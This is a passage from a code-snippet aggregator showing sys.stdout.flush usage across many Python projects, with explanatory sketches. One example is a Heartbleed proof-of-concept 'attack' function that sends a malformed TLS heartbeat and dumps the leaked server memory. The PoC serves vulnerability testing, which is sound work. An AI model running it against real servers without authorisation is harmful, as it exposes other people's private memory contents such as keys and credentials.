    gsutil.upload_file_to_gs(csvfn, gsfnp)

    mypath = os.path.dirname(os.path.realpath(__file__))
    SCHEMA_FILE = '%s/schemas/schema_course_metainfo.json' % mypath
    the_schema = json.loads(open(SCHEMA_FILE).read())[table]

    bqutil.load_data_to_table(dataset, table, gsfnp, the_schema, wait=True, verbose=False, format='csv', skiprows=1)
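
Throughout this function the pattern is: print an announcement ("--> ..."), flush, then start a long blocking call such as a Google Storage upload or a BigQuery table load. When the job's stdout is redirected to a log file, the flush guarantees the announcement is on disk before the slow step begins, so an operator can see which step is currently running. A compact sketch of that announce-then-work pattern with a placeholder for the slow step (names are illustrative, not edx2bigquery APIs):

import sys
import time

def announce(msg):
    print('--> %s' % msg)
    sys.stdout.flush()      # make the log show what is in progress right now

def slow_step(seconds):
    time.sleep(seconds)     # placeholder for an upload or table-load call

announce('Course metainfo uploading to gs://example-bucket/path')
slow_step(1)
announce('Loading course_metainfo table')
slow_step(1)
announce('Done')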

Example 19

Project: CumulusCI Source File: package_upload_ss.py
    def build_package(self, build_name):
        """ Builds a managed package by calling SauceLabs via Selenium to click the Upload button """ 
        # Update Status
        print 'Starting browser'
        sys.stdout.flush()

        try:
            self.driver = self.get_selenium()
        except:
            print "Sleeping 5 more seconds to try again.  Last attempt to connect to Selenium failed"
            sleep(5)
            self.driver = self.get_selenium()

        self.driver.implicitly_wait(90) # seconds

        # Load the packages list page
        self.driver.get('%s/0A2' % self.instance_url)

        # Update Status
        print 'Loaded package listing page'
        sys.stdout.flush()

        # Click the link to the package
        self.driver.find_element_by_xpath("//th[contains(@class,'dataCell')]/a[text()='%s']" % self.package).click()

        # Update Status
        print 'Loaded package page'
        sys.stdout.flush()

        # Click the Upload button to open the upload form
        self.driver.find_element_by_xpath("//input[@class='btn' and @value='Upload']").click()

        # Update Status
        print 'Loaded Upload form'
        sys.stdout.flush()

        # Populate and submit the upload form to create a beta managed package
        name_input = self.driver.find_element_by_id('ExportPackagePage:UploadPackageForm:PackageDetailsPageBlock:PackageDetailsBlockSection:VersionInfoSectionItem:VersionText')
        name_input.clear()
        name_input.send_keys(build_name)
        self.driver.find_element_by_id('ExportPackagePage:UploadPackageForm:PackageDetailsPageBlock:PackageDetailsPageBlockButtons:bottom:upload').click()

        # Update Status
        print 'Upload Submitted'
        sys.stdout.flush()

        # Monitor the package upload progress
        retry_count = 0
        last_status = None
        while True:
            try:
                status_message = self.driver.find_element_by_css_selector('.messageText').text
            except selenium.common.exceptions.StaleElementReferenceException:
                # These come up, possibly if you catch the page in the middle of updating the text via javascript
                sleep(1)
                continue
            except selenium.common.exceptions.NoSuchElementException:
                # These come up, possibly if you catch the page in the middle of updating the text via javascript
                if retry_count > 15:
                    print ".messageText not found after 15 retries"
                    break
                sleep(1)
                retry_count += 1
                continue

            retry_count = 0

            if status_message.startswith('Upload Complete'):
                # Update Status
                print status_message
                sys.stdout.flush()
    
                # Get the version number and install url
                version = self.driver.find_element_by_xpath("//th[text()='Version Number']/following-sibling::td/span").text
                install_url = self.driver.find_element_by_xpath("//a[contains(@name, ':pkgInstallUrl')]").get_attribute('href')
            
                self.version = version
                self.install_url = install_url
    
                break

            if status_message.startswith('Upload Failed'):
                print status_message
                sys.stdout.flush()
                break 

            # Update Status
            if status_message != last_status:
                print status_message
                sys.stdout.flush()
            last_status = status_message

            sleep(1)

        self.driver.quit()    
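
A recurring pattern in the method above is printing the polled status only when it changes and flushing immediately so the build log updates in real time. A reduced sketch under that assumption; poll_status below is a hypothetical stand-in for the Selenium '.messageText' lookup:

import sys
import time
import itertools

# Hypothetical status source standing in for reading the status element from the page.
_states = itertools.chain(['Uploading'] * 3, ['Upload Complete'])

def poll_status():
    return next(_states)

last_status = None
while True:
    status = poll_status()
    if status != last_status:
        print(status)
        sys.stdout.flush()   # push each new status out immediately so CI logs show live progress
    last_status = status
    if status.startswith('Upload Complete'):
        break
    time.sleep(0.2)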

Example 20

Project: PocCollect Source File: heartbleedpoc.py
def attack(ip, port, tlsversion, starttls='none', timeout=5):
    tlslongver = protocol_hex_to_name[tlsversion]
    
    if starttls == 'none':
        print '[INFO] Connecting to ' + str(ip) + ':' + str(port) + ' using ' + tlslongver
    else:
        print '[INFO] Connecting to ' + str(ip) + ':' + str(port) + ' using ' + tlslongver + ' with STARTTLS'
    sys.stdout.flush()
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    
    try:
        s.connect((ip, port))
        if starttls == 'smtp':
            recvall(s, buffer_size)
            s.send('ehlo ' + rand(10) + '\n')
            res = recvall(s, buffer_size)
            if not 'STARTTLS' in res:
                print >> sys.stderr, '\033[93m[ERROR] STARTTLS does not appear to be supported.\033[0m\n'
                sys.stderr.flush()
                return False
            s.send('starttls\n')
            recvall(s, buffer_size)
        elif starttls == 'pop3':
            recvall(s, buffer_size)
            s.send("STLS\n")
            recvall(s, buffer_size)
        elif starttls == 'imap':
            recvall(s, buffer_size)
            s.send("STARTTLS\n")
            recvall(s, buffer_size)
        elif starttls == 'ftp':
            recvall(s, buffer_size)
            s.send("AUTH TLS\n")
            recvall(s, buffer_size)
        
        if verbose: print '[INFO] Sending ClientHello'
        

        s.send(gen_clienthello(tlsversion))
        
        while True:
            type, version, payload = recvmsg(s, timeout)
            if type is None:
                print >> sys.stderr, '\033[93m[ERROR] The server closed the connection without sending the ServerHello. This might mean the server does not support ' + tlslongver + ' or it might not support SSL/TLS at all.\033[0m\n'
                sys.stderr.flush()
                return False
            elif type == 22 and ord(payload[-4]) == 0x0E:
                if verbose: print '[INFO] ServerHello received'
                break
        
        if verbose: print '[INFO] Sending Heartbeat'
        s.send(gen_heartbeat(tlsversion))
        
        while True:
            type, version, payload = recvmsg(s, timeout)
            if type is None:
                print '[INFO] No heartbeat response was received. The server is probably not vulnerable.'
                if verbose: print '[INFO] Closing connection'
                s.close()
                print ''
                sys.stdout.flush()
                return False
            
            if type == 24:
                if len(payload) > 3:
                    print '\033[91m\033[1m[FAIL] Heartbeat response was ' + str(len(payload)) + ' bytes instead of 3! ' + str(ip) + ':' + str(port) + ' is vulnerable over ' + tlslongver + '\033[0m'
                    if display_null_bytes:
                        print '[INFO] Displaying response:'
                    else:
                        print '[INFO] Displaying response (lines consisting entirely of null bytes are removed):'
                    print ''
                    hexdump(payload)
                    print ''
                    if verbose: print '[INFO] Closing connection\n'
                    sys.stdout.flush()
                    s.close()
                    return True
                else:
                    print '[INFO] The server processed the malformed heartbeat, but did not return any extra data.\n'
                    sys.stdout.flush()
                    return False
            
            if type == 21:
                print '[INFO] The server received an alert. It is likely not vulnerable.'
                if verbose: print '[INFO] Alert Level: ' + alert_levels[ord(payload[0])]
                if verbose: print '[INFO] Alert Description: ' + alert_descriptions[ord(payload[1])] + ' (see RFC 5246 section 7.2)'
                if verbose: print '[INFO] Closing connection'
                s.close()
                print ''
                sys.stdout.flush()
                return False
    
    except socket.error as e:
        print >> sys.stderr, '\033[93m[ERROR] Connection error. The port might not be open on the host.\033[0m\n'
        sys.stderr.flush()
        return False
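
The PoC above keeps informational output on stdout and error output on stderr, flushing each stream after writing to it. sys.stderr is unbuffered on Python 2 (line-buffered on Python 3), so its flush is mostly defensive, but flushing both keeps the two streams from interleaving oddly when they are redirected to the same file. A small sketch in Python 3 syntax:

import sys

print('[INFO] connecting to 192.0.2.1:443 ...')        # status goes to stdout
sys.stdout.flush()

print('[ERROR] connection refused', file=sys.stderr)   # errors go to stderr (Python 2 spells this `print >> sys.stderr, ...`)
sys.stderr.flush()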

Example 21

Project: cardoon Source File: tran.py
    def run(self, circuit):
        """
        Calculates transient analysis by solving nodal equations
        """
        # for now just print some fixed stuff
        print('******************************************************')
        print('                 Transient analysis')
        print('******************************************************')
        if hasattr(circuit, 'title'):
            print('\n', circuit.title, '\n')

        if glVar.sparse:
            nd = nodalSP
        else:
            nd = nodal
            print('Using dense matrices\n')

        # Only works with flattened circuits
        if not circuit._flattened:
            circuit.flatten()
            circuit.init()

        # Select integration method
        if self.im == 'BE':
            imo = BEuler()
        elif self.im == 'trap':
            imo = Trapezoidal()
        else:
            raise analysis.AnalysisError(
                'Unknown integration method: {0}'.format(self.im))

        # Create nodal objects and solve for initial state
        nd.make_nodal_circuit(circuit)
        dc = nd.DCNodal(circuit)
        tran = nd.TransientNodal(circuit, imo)
        x = dc.get_guess()
        # Use sources including transient values for t == 0
        sV = tran.get_source(0.)
        # solve DC equations
        try: 
            print('Calculating DC operating point ... ', end='')
            sys.stdout.flush()
            (x, res, iterations) = solve(x, sV, dc.convergence_helpers)
            print('Succeeded.\n')
        except NoConvergenceError as ce:
            print('Failed.\n')
            print(ce)
            return
        dc.save_OP(x)
        tran.set_IC(self.tstep)
        # Release memory in dc object?
        del(dc)

        # Create time vector
        timeVec = np.arange(start=0., stop = self.tstop, step = self.tstep, 
                            dtype=float)
        nsamples = len(timeVec)
        circuit.tran_timevec = timeVec

        # Get terminals to plot/save from circuit. 
        termSet = circuit.get_requested_terms('tran')

        # Special treatment for ground terminal
        termSet1 = set(termSet)
        if circuit.nD_ref in termSet1:
            termSet1.remove(circuit.nD_ref)
            circuit.nD_ref.tran_v = np.zeros(nsamples)

        # Allocate vectors for results
        if self.saveall:
            for term in circuit.nD_termList:
                term.tran_v = np.empty(nsamples)
                term.tran_v[0] = x[term.nD_namRC]                
            circuit.nD_ref.tran_v = np.zeros(nsamples)
        else:
            # Only save requested nodes
            for term in termSet1:
                term.tran_v = np.empty(nsamples)
                term.tran_v[0] = x[term.nD_namRC]

        # Save initial values
        xOld = x
        tIter = 0
        tRes = 0.
        dots = 50
        print('System dimension: {0}'.format(circuit.nD_dimension))
        print('Number of samples: {0}'.format(nsamples))
        print('Integration method: {0}'.format(self.im))
        if self.verbose:
            print('-------------------------------------------------')
            print(' Step    | Time (s)     | Iter.    | Residual    ')
            print('-------------------------------------------------')
        else:
            print('Printing one dot every {0} samples:'.format(dots))
            sys.stdout.flush()

        for i in xrange(1, nsamples):
            tran.accept(xOld)
            sV = tran.get_rhs(timeVec[i])
            # solve equations: use previous time-step solution as an
            # initial guess
            if i > 1:
                # Re-use factorized Jacobian: This saves the time to
                # evaluate the function and Jacobian plus the time for
                # factorization. Only sparse implementation stores
                # factorized Jacobian
                xOld += tran.get_chord_deltax(sV)
            try: 
                (x, res, iterations) = solve(xOld, sV, 
                                             tran.convergence_helpers)
            except NoConvergenceError as ce:
                print(ce)
                return

            # Save results
            xOld[:] = x
            if self.saveall:
                for term in circuit.nD_termList:
                    term.tran_v[i] = x[term.nD_namRC]                
            else:
                # Only save requested nodes
                for term in termSet1:
                    term.tran_v[i] = x[term.nD_namRC]
            # Keep some info about iterations
            tIter += iterations
            tRes += res
            if self.verbose:
                print('{0:8} | {1:12} | {2:8} | {3:12}'.format(
                        i, timeVec[i], iterations, res))
            elif not i%dots:
                print('.', end='')
                sys.stdout.flush()

        # Calculate average residual and iterations
        avei = float(tIter) / nsamples
        aver = tRes / nsamples
        print('\nAverage iterations: {0}'.format(avei))
        print('Average residual: {0}\n'.format(aver))

        # Process output requests.  
        analysis.process_requests(circuit, 'tran', 
                                  timeVec, 'Time [s]', 'tran_v')

        def getvec(termname):
            return circuit.find_term(termname).tran_v

        if self.shell:
            analysis.ipython_drop("""
Available commands:
    timeVec: time vector
    getvec(<terminal>) to retrieve results (if result saved)
""", globals(), locals())

Example 22

Project: COMMIT Source File: core.py
    def load_dictionary( self, path, use_mask = False ) :
        """Load the sparse structure previously created with "trk2dictionary" script.

        Parameters
        ----------
        path : string
            Folder containing the output of the trk2dictionary script (relative to subject path)
        use_mask : boolean
            If False (default) the optimization will be conducted only on the voxels actually
            traversed by tracts. If True, the mask specified in trk2dictionary
            (i.e. "filename_mask" parameter) will be used instead.
            NB: if no mask was specified in trk2dictionary, the "tdi" and
            "mask" masks are equivalent and this parameter has no effect.
        """
        if self.niiDWI is None :
            raise RuntimeError( 'Data not loaded; call "load_data()" first.' )

        tic = time.time()
        print '\n-> Loading the dictionary:'
        self.DICTIONARY = {}
        self.set_config('TRACKING_path', pjoin(self.get_config('DATA_path'),path))

        # load mask
        self.set_config('dictionary_mask', 'mask' if use_mask else 'tdi' )
        mask_filename = pjoin(self.get_config('TRACKING_path'),'dictionary_%s.nii'%self.get_config('dictionary_mask'))
        if not exists( mask_filename ) :
            mask_filename += '.gz'
            if not exists( mask_filename ) :
                raise RuntimeError( 'Dictionary not found. Execute ''trk2dictionary'' script first.' );
        niiMASK = nibabel.load( mask_filename )
        self.DICTIONARY['MASK'] = (niiMASK.get_data() > 0).astype(np.uint8)

        # segments from the tracts
        # ------------------------
        print '\t* segments from the tracts...',
        sys.stdout.flush()

        self.DICTIONARY['IC'] = {}

        self.DICTIONARY['TRK'] = {}

        self.DICTIONARY['TRK']['norm'] = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_TRK_norm.dict'), dtype=np.float32 )

        self.DICTIONARY['IC']['nF'] = self.DICTIONARY['TRK']['norm'].size

        self.DICTIONARY['IC']['fiber'] = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_f.dict'), dtype=np.uint32 )

        self.DICTIONARY['IC']['n'] = self.DICTIONARY['IC']['fiber'].size

        vx = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_vx.dict'), dtype=np.uint8 ).astype(np.uint32)
        vy = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_vy.dict'), dtype=np.uint8 ).astype(np.uint32)
        vz = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_vz.dict'), dtype=np.uint8 ).astype(np.uint32)
        self.DICTIONARY['IC']['v'] = vx + self.get_config('dim')[0] * ( vy + self.get_config('dim')[1] * vz )
        del vx, vy, vz

        ox = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_ox.dict'), dtype=np.uint8 ).astype(np.uint16)
        oy = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_oy.dict'), dtype=np.uint8 ).astype(np.uint16)
        self.DICTIONARY['IC']['o'] = oy + 181*ox
        del ox, oy

        self.DICTIONARY['IC']['len'] = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_len.dict'), dtype=np.float32 )

        self.DICTIONARY['TRK']['len'] = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_TRK_len.dict'), dtype=np.float32 )

        if self.get_config('doNormalizeKernels') :
            # divide the length of each segment by the fiber length so that all the columns of the linear operator will have the same length
            # NB: it works in conjunction with the normalization of the kernels
            sl = self.DICTIONARY['IC']['len']
            tl = self.DICTIONARY['TRK']['norm']
            f  = self.DICTIONARY['IC']['fiber']
            for s in xrange(self.DICTIONARY['IC']['n']) :
                sl[s] /= tl[ f[s] ]

        # reorder the segments based on the "v" field
        idx = np.argsort( self.DICTIONARY['IC']['v'], kind='mergesort' )
        self.DICTIONARY['IC']['v']     = self.DICTIONARY['IC']['v'][ idx ]
        self.DICTIONARY['IC']['o']     = self.DICTIONARY['IC']['o'][ idx ]
        self.DICTIONARY['IC']['fiber'] = self.DICTIONARY['IC']['fiber'][ idx ]
        self.DICTIONARY['IC']['len']   = self.DICTIONARY['IC']['len'][ idx ]
        del idx

        print '[ %d fibers and %d segments ]' % ( self.DICTIONARY['IC']['nF'], self.DICTIONARY['IC']['n'] )

        # segments from the peaks
        # -----------------------
        print '\t* segments from the peaks...',
        sys.stdout.flush()

        self.DICTIONARY['EC'] = {}

        vx = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_EC_vx.dict'), dtype=np.uint8 ).astype(np.uint32)
        vy = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_EC_vy.dict'), dtype=np.uint8 ).astype(np.uint32)
        vz = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_EC_vz.dict'), dtype=np.uint8 ).astype(np.uint32)
        self.DICTIONARY['EC']['v'] = vx + self.get_config('dim')[0] * ( vy + self.get_config('dim')[1] * vz )
        del vx, vy, vz

        self.DICTIONARY['EC']['nE'] = self.DICTIONARY['EC']['v'].size

        ox = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_EC_ox.dict'), dtype=np.uint8 ).astype(np.uint16)
        oy = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_EC_oy.dict'), dtype=np.uint8 ).astype(np.uint16)
        self.DICTIONARY['EC']['o'] = oy + 181*ox
        del ox, oy

        # reorder the segments based on the "v" field
        idx = np.argsort( self.DICTIONARY['EC']['v'], kind='mergesort' )
        self.DICTIONARY['EC']['v'] = self.DICTIONARY['EC']['v'][ idx ]
        self.DICTIONARY['EC']['o'] = self.DICTIONARY['EC']['o'][ idx ]
        del idx

        print ' [ %d segments ]' % self.DICTIONARY['EC']['nE']

        # isotropic compartments
        # ----------------------
        print '\t* isotropic contributions...',
        sys.stdout.flush()

        self.DICTIONARY['ISO'] = {}

        self.DICTIONARY['nV'] = self.DICTIONARY['MASK'].sum()

        vx, vy, vz = ( self.DICTIONARY['MASK'] > 0 ).nonzero() # [TODO] find a way to avoid using int64 (not necessary and waste of memory)
        vx = vx.astype(np.int32)
        vy = vy.astype(np.int32)
        vz = vz.astype(np.int32)
        self.DICTIONARY['ISO']['v'] = vx + self.get_config('dim')[0] * ( vy + self.get_config('dim')[1] * vz )
        del vx, vy, vz

        # reorder the segments based on the "v" field
        idx = np.argsort( self.DICTIONARY['ISO']['v'], kind='mergesort' )
        self.DICTIONARY['ISO']['v'] = self.DICTIONARY['ISO']['v'][ idx ]
        del idx

        print ' [ %d voxels ]' % self.DICTIONARY['nV']

        # post-processing
        # ---------------
        print '\t* post-processing...',
        sys.stdout.flush()

        # get the indices to extract the VOI as in MATLAB (in place of DICTIONARY.MASKidx)
        idx = self.DICTIONARY['MASK'].ravel(order='F').nonzero()[0]
        self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'] = np.unravel_index( idx, self.DICTIONARY['MASK'].shape, order='F' )

        lut = np.zeros( self.get_config('dim'), dtype=np.uint32 ).ravel()
        for i in xrange(idx.size) :
            lut[ idx[i] ] = i
        self.DICTIONARY['IC'][ 'v'] = lut[ self.DICTIONARY['IC'][ 'v'] ]
        self.DICTIONARY['EC'][ 'v'] = lut[ self.DICTIONARY['EC'][ 'v'] ]
        self.DICTIONARY['ISO']['v'] = lut[ self.DICTIONARY['ISO']['v'] ]

        print '         [ OK ]'

        print '   [ %.1f seconds ]' % ( time.time() - tic )
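
The loader above prints a partial line such as '\t* segments from the tracts...' (the trailing comma is Python 2's way of suppressing the newline), flushes so the label shows before the heavy file reads start, and then completes the same line with the result. The same idea in Python 3 syntax, with a sleep standing in for the I/O:

import sys
import time

print('\t* loading segments...', end=' ')
sys.stdout.flush()          # show the label before the slow work begins
time.sleep(1)               # hypothetical stand-in for np.fromfile() and sorting
print('[ OK ]')             # finishes the same line once the work is done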

Example 23

Project: SchoolIdolAPI Source File: migrate_activities.py
    def handle(self, *args, **options):

        print 'Delete activities max bonded/max leveled...'
        while models.Activity.objects.filter(Q(message='Max Leveled a card') | Q(message='Max Bonded a card')).count():
            ids = list(models.Activity.objects.filter(Q(message='Max Leveled a card') | Q(message='Max Bonded a card')).values_list('pk', flat=True)[:100])
            total_this = models.Activity.objects.filter(pk__in=ids).delete()
        print 'Done.'

        print 'Delete activities rank in event without ranking...'
        while get_rankevent_withoutranking_queryset().count():
            ids = list(get_rankevent_withoutranking_queryset().values_list('pk', flat=True)[:100])
            total_this = get_rankevent_withoutranking_queryset().filter(pk__in=ids).delete()
        print 'Done.'

        print 'Cache for owned cards activities'
        while get_ownedcardqueryset().count():
            activities_ownedcards = get_ownedcardqueryset()[:500]
            for activity in activities_ownedcards:
                account = activity.ownedcard.owner_account
                # Fix account
                activity.account = account
                # Cache
                activity = activity_cache_account(activity, account)
                activity.message_data = concat_args(unicode(activity.ownedcard.card), activity.ownedcard.stored)
                activity.right_picture_link = singlecardurl(activity.ownedcard.card)
                activity.right_picture = ownedcardimageurl({}, activity.ownedcard)
                activity.save()
            print '.',
            sys.stdout.flush()
        print 'Done.'

        print 'Cache for rank up activities'
        while get_rankupqueryset().count():
            activities_rankup = get_rankupqueryset()[:500]
            for activity in activities_rankup:
                # Cache
                activity = activity_cache_account(activity, activity.account)
                activity.message_data = concat_args(activity.number)
                activity.save()
            print '.',
            sys.stdout.flush()
        print 'Done.'

        print 'Cache for Rank in event activities'
        while get_rankeventqueryset().count():
            activities_rankevent = get_rankeventqueryset()[:500]
            for activity in activities_rankevent:
                # Cache
                activity = activity_cache_account(activity, activity.account)
                activity.message_data = concat_args(activity.eventparticipation.ranking,
                                                    unicode(activity.eventparticipation.event))
                activity.right_picture = eventimageurl({}, activity.eventparticipation.event, english=(activity.account.language != 'JP'))
                activity.right_picture_link = '/events/' + activity.eventparticipation.event.japanese_name + '/'
                activity.save()
            print '.',
            sys.stdout.flush()
        print 'Done.'

        print 'Remove duplicate activities with ownedcards'
        lastSeenId = float('-Inf')
        i = 0
        total_deleted = 0
        while get_duplicateownedcard_queryset()[i:i+500].count():
            activities_ownedcards = get_duplicateownedcard_queryset()[i:i+500]
            for activity in activities_ownedcards:
                if activity.ownedcard_id == lastSeenId:
                    print 'delete', activity
                    activity.delete()
                    total_deleted += 1
                else:
                    lastSeenId = activity.ownedcard_id
                pass
            i += 500
            print '.',
            sys.stdout.flush()
        print 'Done.'

Example 24

Project: mrepo Source File: wrapperUtils.py
    def callback(self, what, amount, total, hdr, path):
#        print "what: %s amount: %s total: %s hdr: %s path: %s" % (
#          what, amount, total, hdr, path)

        if what == rpm.RPMCALLBACK_INST_OPEN_FILE:
            fileName = "%s/%s-%s-%s.%s.rpm" % (path,
                                               hdr['name'],
                                               hdr['version'],
                                               hdr['release'],
                                               hdr['arch'])
            try:
                self.fd = os.open(fileName, os.O_RDONLY)
            except OSError:
                raise up2dateErrors.RpmError("Error opening %s" % fileName)

            return self.fd
        elif what == rpm.RPMCALLBACK_INST_CLOSE_FILE:
            os.close(self.fd)
            self.fd = 0

        elif what == rpm.RPMCALLBACK_INST_START:
            self.hashesPrinted = 0
            self.lastPercent = 0
            if type(hdr) == type(""):
                print "     %-23.23s" % ( hdr),
                sys.stdout.flush()

            else:
                fileName = "%s/%s-%s-%s.%s.rpm" % (path,
                                                   hdr['name'],
                                                   hdr['version'],
                                                   hdr['release'],
                                                   hdr['arch'])
                if self.cfg["isatty"]:
                    if self.progressCurrent == 0:
                        printit("Installing") 
                    print "%4d:%-23.23s" % (self.progressCurrent + 1,
                                            hdr['name']),
                    sys.stdout.flush()
                else:
                    printit("Installing %s" % fileName)


        # gets called at the start of each repackage, with a count of
        # which package and a total of the number of packages aka:
        # amount: 2 total: 7 for the second package being repackaged
        # out of 7. That sounds obvious, doesn't it?
        elif what == rpm.RPMCALLBACK_REPACKAGE_PROGRESS:
            pass
#            print "what: %s amount: %s total: %s hdr: %s path: %s" % (
#            what, amount, total, hdr, path)
#            self.printRpmHash(amount, total, noInc=1)
            
        elif what == rpm.RPMCALLBACK_REPACKAGE_START:
            printit( "Repackaging")
            #sys.stdout.flush()
            #print "what: %s amount: %s total: %s hdr: %s path: %s" % (
            # what, amount, total, hdr, path)
            
        elif what == rpm.RPMCALLBACK_INST_PROGRESS:
            if type(hdr) == type(""):
                # repackage...
                self.printRpmHash(amount,total, noInc=1)
            else:
                self.printRpmHash(amount,total)


        elif what == rpm.RPMCALLBACK_TRANS_PROGRESS:
            self.printRpmHash(amount, total, noInc=1)

            
        elif what == rpm.RPMCALLBACK_TRANS_START:
            self.hashesPrinted = 0
            self.lastPercent = 0
            self.progressTotal = 1
            self.progressCurrent = 0
            print "%-23.23s" % "Preparing",
            sys.stdout.flush()

        elif what == rpm.RPMCALLBACK_TRANS_STOP:
            self.printRpmHash(1, 1)
            self.progressTotal = self.packagesTotal
            self.progressCurrent = 0
            
        elif (what == rpm.RPMCALLBACK_UNINST_PROGRESS or
              what == rpm.RPMCALLBACK_UNINST_START or
              what == rpm.RPMCALLBACK_UNINST_STOP):
            pass
        
        if hasattr(rpm, "RPMCALLBACK_UNPACK_ERROR"):
            if ((what == rpm.RPMCALLBACK_UNPACK_ERROR) or
                (what == rpm.RPMCALLBACK_CPIO_ERROR)):
                pkg = "%s-%s-%s" % (hdr[rpm.RPMTAG_NAME],
                                    hdr[rpm.RPMTAG_VERSION],
                                    hdr[rpm.RPMTAG_RELEASE])

                if what == rpm.RPMCALLBACK_UNPACK_ERROR:
                    raise up2dateErrors.RpmInstallError, (
                        "There was a rpm unpack error "\
                        "installing the package: %s" % pkg, pkg)
                elif what == rpm.RPMCALLBACK_CPIO_ERROR:
                    raise up2dateErrors.RpmInstallError, (
                        "There was a cpio error "\
                        "installing the package: %s" % pkg, pkg)

Example 25

Project: pyNastran Source File: run_mapping.py
def run_mapping():
    required_inputs = load_inputs()
    structural_call = required_inputs['structural_call']
    isubcase = required_inputs['isubcase']

    configpath = required_inputs['configpath']
    workpath = required_inputs['workpath']

    print("structural_call = %r" % structural_call)

    # load mapping
    cart3dLoads = os.path.join(workpath, 'Cart3d_35000_0.825_10_0_0_0_0.i.triq')
    bdfModel = os.path.join(configpath, 'aeroModel_mod.bdf')
    bdfModelOut = os.path.join(workpath, 'fem_loads_3.bdf')
    # mappingMatrix.new.out - stored in workpath

    # deflection mapping
    cart3dGeom = os.path.join(configpath, 'Cart3d_bwb.i.tri')
    cart3dGeom2 = os.path.join(workpath, 'Components.i.tri')
    bdf = os.path.join(workpath, 'fem3.bdf')
    #op2 = os.path.join(workpath, 'fem3.op2')
    f06 = os.path.join(workpath, 'fem3.f06')

    assert os.path.exists(bdf), '%r doesnt exist' % bdf
    assert os.path.exists(bdfModel), '%r doesnt exist' % bdfModel
    assert os.path.exists(cart3dGeom), '%r doesnt exist' % cart3dGeom

    os.chdir(workpath)
    copy_file(cart3dGeom, 'Components.i.tri')

    node_list = [
        20037, 21140, 21787, 21028, 1151, 1886, 2018, 1477, 1023, 1116, 1201,
        1116, 1201, 1828, 2589, 1373, 1315, 1571, 1507, 1532, 1317, 1327, 2011,
        1445, 2352, 1564, 1878, 1402, 1196, 1234, 1252, 1679, 1926, 1274, 2060,
        2365, 21486, 20018, 20890, 20035, 1393, 2350, 1487, 1530, 1698, 1782
    ]
    with open('convergeDeflections.out', 'ab') as outfile:
        max_aero_deflection_old = 0.
        niterations = 30
        #icart = 1
        for i in range(1, niterations):
            strI = '_' + str(i)
            assert os.path.exists('Components.i.tri')
            #if i==iCart:
            if 0:
                # run cart3d
                log.info("---running Cart3d #%s---" % i)
                sys.stdout.flush()

                # runs cart3d.i.tri, makes Components.i.triq
                fail_flag = os.system('./COMMAND > command.out')
                assert fail_flag == 0, 'Cart3d ./COMMAND failed on iteration #%s' % i
                move_file('Components.i.triq', cart3dLoads)
                copy_file(cart3dLoads, cart3dLoads + strI)
                copy_file('forces.dat', 'forces.dat' + strI)
                copy_file('moments.dat', 'moments.dat' + strI)
                copy_file('loadsCC.dat', 'loadsCC.dat' + strI)
                copy_file('history.dat', 'history.dat' + strI)
                os.remove('Components.i.tri') # verifies new Components.i.tri gets created
                sys.stdout.flush()

            # map loads
            run_map_loads(required_inputs, cart3dLoads, bdfModel, bdfModelOut)  # maps loads
            copy_file(bdfModelOut, bdfModelOut + strI)

            # run nastran
            log.info("---running Nastran #%s---" % i)
            sys.stdout.flush()
            # runs fem3.bdf with fem_loads_3.bdf
            #fail_flag = os.system('nastran scr=yes bat=no fem3.bdf')
            #assert fail_flag == 0,'nastran failed on iteration #%s' % i
            #copy_file('fem3.op2', 'fem3.op2' + strI)
            copy_file('fem3.f06', 'fem3.f06' + strI)

            # map deflections
            (wA, wS) = run_map_deflections(node_list, bdf, f06, cart3dGeom, cart3dGeom2, log=log)
            #(wA, wS) = run_map_deflections(nodeList, bdf, op2, cart3dGeom, cart3dGeom2, log=log)
            assert os.path.exists('Components.i.tri')

            # cleans up fem_loads.bdf
            os.remove(bdfModelOut)
            #if 0:
                # disabled b/c nastran isn't on this computer
                #os.remove(op2) # verifies new fem3.op2 was created
                #os.remove(f06) # verifies new fem3.f06 was created

            # post-processing
            (max_aero_nid, max_aero_deflection) = max_dict(wA)
            max_structural_nid = '???'
            max_aero_deflection = wA[max_aero_nid]
            max_structural_deflection = max(wS)[0, 0]
            log.info("AERO      - i=%s max_aero_nid=%s max_aero_deflection=%s"   % (
                i, max_aero_nid, max_aero_deflection))
            log.info("STRUCTURE - i=%s max_structural_nid=%s max_structural_deflection=%s"   % (
                i, max_structural_nid, max_structural_deflection))
            outfile.write("AERO      - i=%s max_aero_nid=%s max_aero_deflection=%s\n" % (
                i, max_aero_nid, max_aero_deflection))
            outfile.write("STRUCTURE - i=%s max_structural_nid=%s max_structural_deflection=%s\n" % (
                i, max_structural_nid, max_structural_deflection))

            msg = '\n'+'*' * 80 + '\n'
            msg += 'finished iteration #%s\n' % (i)
            msg += '*' * 80 + '\n'
            log.info(msg)

            if allclose(max_aero_deflection, max_aero_deflection_old, atol=0.001):
                break
            max_aero_deflection_old = copy.deepcopy(max_aero_deflection)
            #icart += 1
            sys.stdout.flush()

    log.info('---finished runMapping.py---')
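
The mapping driver above flushes stdout around its external Cart3d/Nastran steps (invoked with os.system). Flushing before spawning a child process matters because the parent's buffered output would otherwise appear after the child's output in a redirected log. A small sketch of that ordering concern, using subprocess.call with the current interpreter as a harmless child:

import subprocess
import sys

print('---running external solver---')
sys.stdout.flush()   # flush BEFORE the child starts, or this line may show up after the child's output in a log file
ret = subprocess.call([sys.executable, '-c', "print('child output')"])
assert ret == 0, 'child process failed'
print('---solver finished---')
sys.stdout.flush()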

Example 26

Project: text2image Source File: alignDraw.py
Function: train
